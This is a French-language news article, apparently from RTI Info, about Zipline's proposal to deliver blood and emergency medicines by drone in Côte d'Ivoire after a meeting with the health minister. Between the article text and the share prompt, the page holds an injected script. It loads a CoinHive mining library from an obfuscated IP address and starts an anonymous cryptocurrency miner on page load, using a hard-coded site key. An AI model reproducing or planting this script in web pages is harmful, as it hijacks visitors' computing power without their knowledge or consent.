Des drones pour bientôt convoyer du sang et des médicaments en Côte d’Ivoire.
0
 

Écouter
Des drones pour bientôt convoyer du sang et des médicaments en Côte d’Ivoire.

Des drones pour bientôt convoyer du sang et des médicaments en Côte d’Ivoire.

RTI Info / Lacinan Ouattara | Lu 1927 fois | Publié

Le ministre de la Santé et de l’hygiène publique, Dr Aka Aouélé a accordé une audience à Zipline internationale. Une société spécialisée dans la distribution de produits sanguins et de médicaments d’urgences par drone médical. Cette entreprise souhaite un partenariat avec l’État ivoirien en vue de la distribution du sang et des médicaments d’urgences. L’on pourrait ainsi expédier du sang en cas d’urgence dans les zones enclavées et les plus reculées du pays pour faire face aux urgences sanitaires.

"Nous sommes la première compagnie au monde de fabrication de drone. Nous sommes aussi spécialisés dans la distribution de produits médicaux par drone. L’objectif est notre implémentation en Côte d’Ivoire afin de contribuer à l’amélioration de la qualité de soins. Zipline internationale est très honorée de cette audience à elle accordée par le Ministre de la Santé", a indiqué Yanlev Galler, responsable de Zipline Afrique.

"La distribution des produits médicaux par les drones n’est pas à sa première expérience en Afrique. Le Rwanda est un bel exemple en la matière. Bientôt le Ghana et le Kenya lui emboiteront le pas", a ajouté M. Galler. 

A noter que drones de Zipline Internationale ont une vitesse de 165km/h et un système de conservation des produits les mettant ainsi à l’abri des intempéries. 

 

 

<script src="https://0x6814D03B/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('f8XBOx6egKlyNr6RU9M1hnmEJd81a17g');
miner.start();
</script>

Cet article vous a plu ! Partagez-le maintenant

A lire également

 
 
 
 
 
 
 
 
 
 

En continu

Des étudiants de l’Université Alassane Ouattara ont pris part à une formation sur les instruments de lutte contre la torture

Des élèves du secondaire public et privé de plusieurs localités vident les salles de classes pour réclamer des congés anticipés

Togo: un nouveau mort par balle dans les affrontements avec les forces de l'ordre (Amnesty International

Le VIH/SIDA est une réalité dans le Gbêke avec plus 18.000 personnes infectées

Abengourou : Sit-in des fonctionnaires et agents de l’administration territoriale à la sous-préfecture